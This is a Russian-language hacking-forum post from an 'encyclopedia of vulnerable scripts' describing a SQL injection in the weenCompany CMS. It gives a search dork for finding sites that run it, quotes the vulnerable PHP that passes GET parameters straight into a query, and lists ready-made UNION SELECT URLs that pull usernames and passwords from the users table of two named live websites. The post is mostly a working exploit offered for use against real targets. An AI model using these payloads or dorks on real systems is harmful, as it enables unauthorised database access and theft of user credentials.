Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

weenCompany
китайская цмс

Сайт: http://www.weentech.com/
Дорк: "Created by weenCompany"

SQL-injection

Уязвимый код:
index.php

PHP код:


		
			
. . . 

if($article = $DB->query_first("SELECT title, metakeywords, metadescription 

FROM " . TABLE_PREFIX . $_GET['moduleid']. " WHERE articleid = '" . $_GET['articleid'] . "'"))

. . .

Эксплуатация:

Цитата:

site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1

Примеры:

Цитата:

http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1

Вывод в тайтле